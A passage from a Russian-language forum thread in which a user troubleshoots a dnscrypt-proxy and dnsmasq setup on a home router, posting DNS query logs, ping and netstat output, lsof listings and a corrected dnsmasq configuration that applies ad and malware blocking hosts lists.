    Созданный dnscrypt-proxy.60053.log чистый с момента запуска в нем тишина. Пока без замечаний.

    Sun Aug  5 11:39:29 2017 [NOTICE] Starting dnscrypt-proxy 1.9.5
    Sun Aug  5 11:39:29 2017 [INFO] Generating a new session key pair
    Sun Aug  5 11:39:29 2017 [INFO] Done
    Sun Aug  5 11:39:29 2017 [INFO] Server certificate with serial #1493333488 received
    Sun Aug  5 11:39:29 2017 [INFO] This certificate is valid
    Sun Aug  5 11:39:29 2017 [INFO] Chosen certificate #1493333488 is valid from [2017-03-24] to [2018-03-24]
    Sun Aug  5 11:39:29 2017 [INFO] The key rotation period for this server may exceed the recommended value. This is bad for forward secrecy.
    Sun Aug  5 11:39:29 2017 [INFO] Server key fingerprint is E7F8:4477:BF89:1434:1ECE:23F0:D6A6:6EB9:4F45:3167:D71F:80BB:4E80:A04F:F180:F778
    Sun Aug  5 11:39:29 2017 [NOTICE] Proxying from 127.0.0.2:60053 to 208.67.220.220:443
    Sun Aug  5 12:41:00 2017 [INFO] Refetching server certificates
    Sun Aug  5 12:41:00 2017 [INFO] Server certificate with serial #1493333488 received
    Sun Aug  5 12:41:00 2017 [INFO] This certificate is valid
    Sun Aug  5 12:41:00 2017 [INFO] Chosen certificate #1493333488 is valid from [2017-03-24] to [2018-03-24]
    Sun Aug  5 12:41:00 2017 [INFO] The key rotation period for this server may exceed the recommended value. This is bad for forward secrecy.
    Sun Aug  5 12:41:00 2017 [INFO] Server key fingerprint is E7F8:4477:BF89:1434:1ECE:23F0:D6A6:6EB9:4F45:3167:D71F:80BB:4E80:A04F:F180:F778
    ....

    По dnsmasq log

    Скрытый текст

    Aug  5 14:17:22 dnsmasq[7303]: compile time options: IPv6 GNU-getopt no-RTC no-DBus no-i18n no-IDN DHCP DHCPv6 no-Lua TFTP conntrack ipset auth no-DNSSEC no-ID loop-detect inotify
    Aug  5 14:17:22 dnsmasq[7303]: using nameserver 127.0.0.2#60053
    Aug  5 14:17:23 dnsmasq[7303]: read /opt/etc/hosts - 2 addresses
    Aug  5 14:17:23 dnsmasq[7303]: read /opt/tmp/mvps_block.host - 13273 addresses
    Aug  5 14:17:23 dnsmasq[7303]: read /opt/tmp/malwaredom_block.host - 1157 addresses
    Aug  5 14:17:23 dnsmasq[7303]: read /opt/tmp/hosts0 - 101 addresses
    Aug  5 14:17:25 dnsmasq[7303]: query[A] teredo.ipv6.microsoft.com from 192.168.1.2
    Aug  5 14:17:25 dnsmasq[7303]: forwarded teredo.ipv6.microsoft.com to 127.0.0.2
    Aug  5 14:17:26 dnsmasq[7303]: query[A] teredo.ipv6.microsoft.com from 192.168.1.2
    Aug  5 14:17:26 dnsmasq[7303]: forwarded teredo.ipv6.microsoft.com to 127.0.0.2
    Aug  5 14:17:27 dnsmasq[7303]: query[A] teredo.ipv6.microsoft.com from 192.168.1.2
    Aug  5 14:17:27 dnsmasq[7303]: forwarded teredo.ipv6.microsoft.com to 127.0.0.2
    Aug  5 14:17:29 dnsmasq[7303]: query[A] teredo.ipv6.microsoft.com from 192.168.1.2
    Aug  5 14:17:29 dnsmasq[7303]: forwarded teredo.ipv6.microsoft.com to 127.0.0.2
    Aug  5 14:17:33 dnsmasq[7303]: query[A] teredo.ipv6.microsoft.com from 192.168.1.2
    Aug  5 14:17:33 dnsmasq[7303]: forwarded teredo.ipv6.microsoft.com to 127.0.0.2
    Aug  5 14:18:04 dnsmasq[7303]: query[A] mail.yandex.ru from 192.168.1.2
    Aug  5 14:18:04 dnsmasq[7303]: forwarded mail.yandex.ru to 127.0.0.2
    Aug  5 14:18:05 dnsmasq[7303]: query[A] mail.yandex.ru from 192.168.1.2
    Aug  5 14:18:05 dnsmasq[7303]: forwarded mail.yandex.ru to 127.0.0.2
    Aug  5 14:18:06 dnsmasq[7303]: query[A] mail.yandex.ru from 192.168.1.2
    Aug  5 14:18:06 dnsmasq[7303]: forwarded mail.yandex.ru to 127.0.0.2
    Aug  5 14:18:08 dnsmasq[7303]: query[A] mail.yandex.ru from 192.168.1.2
    Aug  5 14:18:08 dnsmasq[7303]: forwarded mail.yandex.ru to 127.0.0.2
    Aug  5 14:18:09 dnsmasq[7303]: query[A] teredo.ipv6.microsoft.com from 192.168.1.2
    Aug  5 14:18:09 dnsmasq[7303]: forwarded teredo.ipv6.microsoft.com to 127.0.0.2
    Aug  5 14:18:10 dnsmasq[7303]: query[A] teredo.ipv6.microsoft.com from 192.168.1.2
    Aug  5 14:18:10 dnsmasq[7303]: forwarded teredo.ipv6.microsoft.com to 127.0.0.2
    Aug  5 14:18:11 dnsmasq[7303]: query[A] teredo.ipv6.microsoft.com from 192.168.1.2
    Aug  5 14:18:11 dnsmasq[7303]: forwarded teredo.ipv6.microsoft.com to 127.0.0.2
    Aug  5 14:18:12 dnsmasq[7303]: query[A] mail.yandex.ru from 192.168.1.2
    Aug  5 14:18:12 dnsmasq[7303]: forwarded mail.yandex.ru to 127.0.0.2

    ...

    Aug  5 14:19:57 dnsmasq[7303]: query[A] fonts.googleapis.com from 192.168.1.2
    Aug  5 14:19:57 dnsmasq[7303]: forwarded fonts.googleapis.com to 127.0.0.2
    Aug  5 14:19:57 dnsmasq[7303]: reply fonts.googleapis.com is <CNAME>
    Aug  5 14:19:57 dnsmasq[7303]: reply googleadapis.l.google.com is 173.194.222.95
    Aug  5 14:19:57 dnsmasq[7303]: query[A] googleadapis.l.google.com from 192.168.1.2
    Aug  5 14:19:57 dnsmasq[7303]: forwarded googleadapis.l.google.com to 127.0.0.2
    Aug  5 14:19:57 dnsmasq[7303]: reply googleadapis.l.google.com is 173.194.222.95
    Aug  5 14:19:57 dnsmasq[7303]: query[AAAA] googleadapis.l.google.com from 192.168.1.2
    Aug  5 14:19:57 dnsmasq[7303]: forwarded googleadapis.l.google.com to 127.0.0.2
    Aug  5 14:19:57 dnsmasq[7303]: reply googleadapis.l.google.com is 2a00:1450:4010:c07::5f

    ...

    Aug  5 14:20:07 dnsmasq[7303]: query[A] rbc.ru from 192.168.1.2
    Aug  5 14:20:07 dnsmasq[7303]: forwarded rbc.ru to 127.0.0.2
    Aug  5 14:20:07 dnsmasq[7303]: reply rbc.ru is 80.68.253.9
    Aug  5 14:20:07 dnsmasq[7303]: reply rbc.ru is 185.72.229.9
    Aug  5 14:20:07 dnsmasq[7303]: query[A] rbc.ru from 192.168.1.2
    Aug  5 14:20:07 dnsmasq[7303]: forwarded rbc.ru to 127.0.0.2
    Aug  5 14:20:07 dnsmasq[7303]: reply rbc.ru is 80.68.253.9
    Aug  5 14:20:07 dnsmasq[7303]: reply rbc.ru is 185.72.229.9
    Aug  5 14:20:07 dnsmasq[7303]: query[AAAA] rbc.ru from 192.168.1.2
    Aug  5 14:20:07 dnsmasq[7303]: forwarded rbc.ru to 127.0.0.2
    Aug  5 14:20:07 dnsmasq[7303]: query[A] www.rbc.ru from 192.168.1.2
    Aug  5 14:20:07 dnsmasq[7303]: forwarded www.rbc.ru to 127.0.0.2
    Aug  5 14:20:07 dnsmasq[7303]: reply www.rbc.ru is 185.72.229.11
    Aug  5 14:20:07 dnsmasq[7303]: reply www.rbc.ru is 80.68.253.11
    Aug  5 14:20:07 dnsmasq[7303]: query[A] www.rbc.ru from 192.168.1.2
    Aug  5 14:20:07 dnsmasq[7303]: forwarded www.rbc.ru to 127.0.0.2
    Aug  5 14:20:07 dnsmasq[7303]: reply rbc.ru is NODATA-IPv6
    Aug  5 14:20:07 dnsmasq[7303]: reply www.rbc.ru is 185.72.229.11
    Aug  5 14:20:07 dnsmasq[7303]: reply www.rbc.ru is 80.68.253.11
    Aug  5 14:20:07 dnsmasq[7303]: query[AAAA] www.rbc.ru from 192.168.1.2
    Aug  5 14:20:07 dnsmasq[7303]: forwarded www.rbc.ru to 127.0.0.2
    Aug  5 14:20:07 dnsmasq[7303]: reply www.rbc.ru is NODATA-IPv6

    ...

    Aug  5 14:28:39 dnsmasq[7303]: query[A] mail.radar.imgsmail.ru from 192.168.1.2
    Aug  5 14:28:39 dnsmasq[7303]: forwarded mail.radar.imgsmail.ru to 127.0.0.2
    Aug  5 14:28:39 dnsmasq[7303]: query[A] img.imgsmail.ru from 192.168.1.2
    Aug  5 14:28:39 dnsmasq[7303]: forwarded img.imgsmail.ru to 127.0.0.2
    Aug  5 14:28:39 dnsmasq[7303]: query[A] mc.yandex.ru from 192.168.1.2
    Aug  5 14:28:39 dnsmasq[7303]: /opt/tmp/mvps_block.host mc.yandex.ru is 0.0.0.0
    Aug  5 14:28:39 dnsmasq[7303]: query[A] portal.mail.ru from 192.168.1.2
    Aug  5 14:28:39 dnsmasq[7303]: forwarded portal.mail.ru to 127.0.0.2
    Aug  5 14:28:39 dnsmasq[7303]: query[A] limg.imgsmail.ru from 192.168.1.2
    Aug  5 14:28:39 dnsmasq[7303]: forwarded limg.imgsmail.ru to 127.0.0.2
    Aug  5 14:28:39 dnsmasq[7303]: query[A] r.mradx.net from 192.168.1.2
    Aug  5 14:28:39 dnsmasq[7303]: forwarded r.mradx.net to 127.0.0.2
    Aug  5 14:28:39 dnsmasq[7303]: query[A] filin.mail.ru from 192.168.1.2
    Aug  5 14:28:39 dnsmasq[7303]: forwarded filin.mail.ru to 127.0.0.2
    Aug  5 14:28:39 dnsmasq[7303]: reply mail.radar.imgsmail.ru is <CNAME>
    Aug  5 14:28:39 dnsmasq[7303]: reply common.radar.imgsmail.ru is 185.5.137.179
    Aug  5 14:28:39 dnsmasq[7303]: reply img.imgsmail.ru is 217.69.139.101
    Aug  5 14:28:39 dnsmasq[7303]: reply portal.mail.ru is 217.69.139.59
    Aug  5 14:28:39 dnsmasq[7303]: reply portal.mail.ru is 94.100.180.59
    Aug  5 14:28:39 dnsmasq[7303]: reply portal.mail.ru is 217.69.139.58
    Aug  5 14:28:39 dnsmasq[7303]: reply limg.imgsmail.ru is 217.69.139.209
    Aug  5 14:28:39 dnsmasq[7303]: reply limg.imgsmail.ru is 94.100.180.211
    Aug  5 14:28:39 dnsmasq[7303]: reply limg.imgsmail.ru is 217.69.139.211
    Aug  5 14:28:39 dnsmasq[7303]: reply limg.imgsmail.ru is 94.100.180.209
    Aug  5 14:28:39 dnsmasq[7303]: reply r.mradx.net is 217.69.139.244
    Aug  5 14:28:39 dnsmasq[7303]: query[A] pass.yandex.ru from 192.168.1.2
    Aug  5 14:28:39 dnsmasq[7303]: forwarded pass.yandex.ru to 127.0.0.2
    Aug  5 14:28:39 dnsmasq[7303]: reply filin.mail.ru is 185.5.136.33
    Aug  5 14:28:39 dnsmasq[7303]: reply pass.yandex.ru is 213.180.204.51
    Aug  5 14:28:39 dnsmasq[7303]: query[A] bar.love.mail.ru from 192.168.1.2
    Aug  5 14:28:39 dnsmasq[7303]: forwarded bar.love.mail.ru to 127.0.0.2
    Aug  5 14:28:39 dnsmasq[7303]: query[A] ocsp2.globalsign.com from 192.168.1.2
    Aug  5 14:28:39 dnsmasq[7303]: forwarded ocsp2.globalsign.com to 127.0.0.2
    Aug  5 14:28:39 dnsmasq[7303]: query[A] ok.ru from 192.168.1.2
    Aug  5 14:28:39 dnsmasq[7303]: forwarded ok.ru to 127.0.0.2
    Aug  5 14:28:39 dnsmasq[7303]: reply bar.love.mail.ru is 193.0.170.53
    Aug  5 14:28:39 dnsmasq[7303]: reply bar.love.mail.ru is 193.0.170.54
    Aug  5 14:28:39 dnsmasq[7303]: reply ocsp2.globalsign.com is <CNAME>
    Aug  5 14:28:39 dnsmasq[7303]: reply cdn.globalsigncdn.com is 104.16.24.216
    Aug  5 14:28:39 dnsmasq[7303]: reply cdn.globalsigncdn.com is 104.16.28.216
    Aug  5 14:28:39 dnsmasq[7303]: reply cdn.globalsigncdn.com is 104.16.25.216
    Aug  5 14:28:39 dnsmasq[7303]: reply cdn.globalsigncdn.com is 104.16.26.216
    Aug  5 14:28:39 dnsmasq[7303]: reply cdn.globalsigncdn.com is 104.16.27.216
    Aug  5 14:28:39 dnsmasq[7303]: reply ok.ru is 5.61.23.11
    Aug  5 14:28:39 dnsmasq[7303]: reply ok.ru is 217.20.155.13
    Aug  5 14:28:39 dnsmasq[7303]: reply ok.ru is 217.20.156.167
    Aug  5 14:28:39 dnsmasq[7303]: query[A] clients1.google.com from 192.168.1.2
    Aug  5 14:28:39 dnsmasq[7303]: forwarded clients1.google.com to 127.0.0.2
    Aug  5 14:28:39 dnsmasq[7303]: reply clients1.google.com is <CNAME>
    Aug  5 14:28:39 dnsmasq[7303]: reply clients.l.google.com is 173.194.44.78
    Aug  5 14:28:39 dnsmasq[7303]: reply clients.l.google.com is 173.194.44.69
    Aug  5 14:28:39 dnsmasq[7303]: reply clients.l.google.com is 173.194.44.72
    Aug  5 14:28:39 dnsmasq[7303]: reply clients.l.google.com is 173.194.44.66
    Aug  5 14:28:39 dnsmasq[7303]: reply clients.l.google.com is 173.194.44.65
    Aug  5 14:28:39 dnsmasq[7303]: reply clients.l.google.com is 173.194.44.70
    Aug  5 14:28:39 dnsmasq[7303]: reply clients.l.google.com is 173.194.44.73
    Aug  5 14:28:39 dnsmasq[7303]: reply clients.l.google.com is 173.194.44.64
    Aug  5 14:28:39 dnsmasq[7303]: reply clients.l.google.com is 173.194.44.71
    Aug  5 14:28:39 dnsmasq[7303]: reply clients.l.google.com is 173.194.44.68
    Aug  5 14:28:39 dnsmasq[7303]: reply clients.l.google.com is 173.194.44.67

    Выяснился еще один баг или точнее не баг, а то как настроена система. Клиент ping на адрес из /opt/tmp/malwaredom_block.host - "0.0.0.0  www.w......o.com" на клиенте все нормально, но если выполнять локально на роутере, то получаем

    Скрытый текст

    1.

    с клиента если "ping www.w......o.com" имеем

    Aug  6 12:01:00 dnsmasq[24293]: query[A] www.w......o.com from 192.168.1.2
    Aug  6 12:01:00 dnsmasq[24293]: /opt/tmp/malwaredom_block.host www.wigglewoo.com is 0.0.0.0

    или если ping 0.0.0.0 то сбой передачи


    2. с роутера

    /opt/etc/init.d # ping www.w......o.com
    PING www.wigglewoo.com (85.13.149.245): 56 data bytes
    64 bytes from 85.13.149.245: seq=0 ttl=59 time=64.597 ms
    ^C
    --- www.w......o.com ping statistics ---
    1 packets transmitted, 1 packets received, 0% packet loss
    round-trip min/avg/max = 64.597/64.597/64.597 ms
    /opt/etc/init.d # ping 0.0.0.0
    PING 0.0.0.0 (0.0.0.0): 56 data bytes
    64 bytes from 127.0.0.1: seq=0 ttl=64 time=0.434 ms
    64 bytes from 127.0.0.1: seq=1 ttl=64 time=0.363 ms
    ^C
    --- 0.0.0.0 ping statistics ---
    2 packets transmitted, 2 packets received, 0% packet loss
    round-trip min/avg/max = 0.363/0.398/0.434 ms
    /opt/etc/init.d #

     

    Решение проблемы настройка более правельнее ниже

    Скрытый текст

    DNSmasq

    no-resolv
    interface=br0
    bind-interfaces
    listen-address=192.168.1.100
    except-interface=lo
    server=127.0.0.2#60053
    addn-hosts=/opt/tmp/hosts0
    addn-hosts=/opt/tmp/malwaredom_block.host
    addn-hosts=/opt/tmp/mvps_block.host
    cache-size=0

    Теперь все правельно.

    Скрытый текст

    из списка malwaredom_block

    /opt/etc/init.d #
    /opt/etc/init.d # ping yo.......com
    PING youtuhe.com (34.196.13.28): 56 data bytes
    ^C
    --- yo.......com ping statistics ---
    3 packets transmitted, 0 packets received, 100% packet loss
    /opt/etc/init.d # netstat -tulap | grep dns
    tcp        0      0 192.168.1.100:domain  0.0.0.0:*               LISTEN      27271/dnsmasq
    tcp        0      0 127.0.0.2:60053         0.0.0.0:*               LISTEN      24266/dnscrypt-prox
    tcp        0      0 fe80::......a8:domain :::*                    LISTEN      27271/dnsmasq
    udp        0      0 127.0.0.2:60053         0.0.0.0:*                           24266/dnscrypt-prox
    udp        0      0 192.168.1.100:domain  0.0.0.0:*                           27271/dnsmasq
    udp        0      0 0.0.0.0:35326           0.0.0.0:*                           24266/dnscrypt-prox
    udp        0      0 fe80::.....a8:domain :::*                                27271/dnsmasq
    /opt/etc/init.d #

    Текущий конфиг для DNSmasq более оптимальный для работы, вопрос открытый только по какому варианту работает ПРОШИВКА если ей нужно обратиться по мнемонике - тут два варианта "localhost:domain" или по интерфейсу "br0:domain"

    • Thanks 1
  18. Ну вообще порадовали.

    Пока все запустилось.

    Скрытый текст

    dnsmasq   5277      nobody  cwd       DIR       31,4      202         71 /
    dnsmasq   5277      nobody  rtd       DIR       31,4      202         71 /
    dnsmasq   5277      nobody  txt       REG        8,2   282388       6321 /opt/sbin/dnsmasq
    dnsmasq   5277      nobody  mem       REG        8,2    49680       4109 /opt/lib/libnss_files-2.25.so
    dnsmasq   5277      nobody  mem       REG        8,2    17764       4257 /opt/lib/libmnl.so.0.2.0
    dnsmasq   5277      nobody  mem       REG        8,2  1616316       4129 /opt/lib/libc-2.25.so
    dnsmasq   5277      nobody  mem       REG        8,2    93848       4131 /opt/lib/libgcc_s.so.1
    dnsmasq   5277      nobody  mem       REG        8,2    24944       4255 /opt/lib/libnfnetlink.so.0.2.0
    dnsmasq   5277      nobody  mem       REG        8,2   118740       4253 /opt/lib/libnetfilter_conntrack.so.3.6.0
    dnsmasq   5277      nobody  mem       REG        8,2   150220       4128 /opt/lib/ld-2.25.so
    dnsmasq   5277      nobody    0u      CHR        1,3      0t0       1053 /dev/null
    dnsmasq   5277      nobody    1u      CHR        1,3      0t0       1053 /dev/null
    dnsmasq   5277      nobody    2u      CHR        1,3      0t0       1053 /dev/null
    dnsmasq   5277      nobody    3u  netlink                 0t0      91211 ROUTE
    dnsmasq   5277      nobody    4u     IPv4      91213      0t0        UDP 192.168.1.100:domain
    dnsmasq   5277      nobody    5u     IPv4      91214      0t0        TCP 192.168.1.100:domain (LISTEN)
    dnsmasq   5277      nobody    6u     IPv4      91215      0t0        UDP localhost:domain
    dnsmasq   5277      nobody    7u     IPv4      91216      0t0        TCP localhost:domain (LISTEN)
    dnsmasq   5277      nobody    8u     IPv6      91217      0t0        UDP [fe80::...8]:domain
    dnsmasq   5277      nobody    9u     IPv6      91218      0t0        TCP [fe80::...8]:domain (LISTEN)
    dnsmasq   5277      nobody   10u     IPv6      91219      0t0        UDP localhost:domain
    dnsmasq   5277      nobody   11u     IPv6      91220      0t0        TCP localhost:domain (LISTEN)
    dnsmasq   5277      nobody   12r  a_inode        0,7        0          4 inotify
    dnsmasq   5277      nobody   13r     FIFO        0,6      0t0      91225 pipe
    dnsmasq   5277      nobody   14w     FIFO        0,6      0t0      91225 pipe
    dnsmasq   5277      nobody   15u     unix 0x84c62800      0t0      89329 type=DGRAM
    dnscrypt- 6047        root  cwd       DIR        8,2     1024     245764 /opt/etc/init.d
    dnscrypt- 6047        root  rtd       DIR       31,4      202         71 /
    dnscrypt- 6047        root  txt       REG        8,2   158416       6327 /opt/sbin/dnscrypt-proxy
    dnscrypt- 6047        root  mem       REG        8,2   122696       4123 /opt/lib/libpthread-2.25.so
    dnscrypt- 6047        root  mem       REG        8,2  1616316       4129 /opt/lib/libc-2.25.so
    dnscrypt- 6047        root  mem       REG        8,2    93848       4131 /opt/lib/libgcc_s.so.1
    dnscrypt- 6047        root  mem       REG        8,2   996704       4130 /opt/lib/libm-2.25.so
    dnscrypt- 6047        root  mem       REG        8,2    10664       4120 /opt/lib/libdl-2.25.so
    dnscrypt- 6047        root  mem       REG        8,2   464288       4357 /opt/lib/libsodium.so.18.3.0
    dnscrypt- 6047        root  mem       REG        8,2    36628       4325 /opt/lib/libltdl.so.7.3.0
    dnscrypt- 6047        root  mem       REG        8,2   150220       4128 /opt/lib/ld-2.25.so
    dnscrypt- 6047        root    0r      CHR        1,3      0t0       1053 /dev/null
    dnscrypt- 6047        root    1w      CHR        1,3      0t0       1053 /dev/null
    dnscrypt- 6047        root    2w      CHR        1,3      0t0       1053 /dev/null
    dnscrypt- 6047        root    3r      CHR        1,9      0t0       1070 /dev/urandom
    dnscrypt- 6047        root    4u     unix 0x84c62e00      0t0      99913 type=DGRAM
    dnscrypt- 6047        root    5u  a_inode        0,7        0          4 [eventpoll]
    dnscrypt- 6047        root    6u     unix 0x84c62600      0t0      99914 type=STREAM
    dnscrypt- 6047        root    7u     unix 0x85b0be00      0t0      99915 type=STREAM
    dnscrypt- 6047        root    8r      CHR        1,9      0t0       1070 /dev/urandom
    dnscrypt- 6047        root    9u     IPv4      99916      0t0        UDP localhost:60053
    dnscrypt- 6047        root   10u     IPv4      99917      0t0        UDP *:43689
    dnscrypt- 6047        root   11u     IPv4      99918      0t0        TCP localhost:60053 (LISTEN)

     

×
×
  • Create New...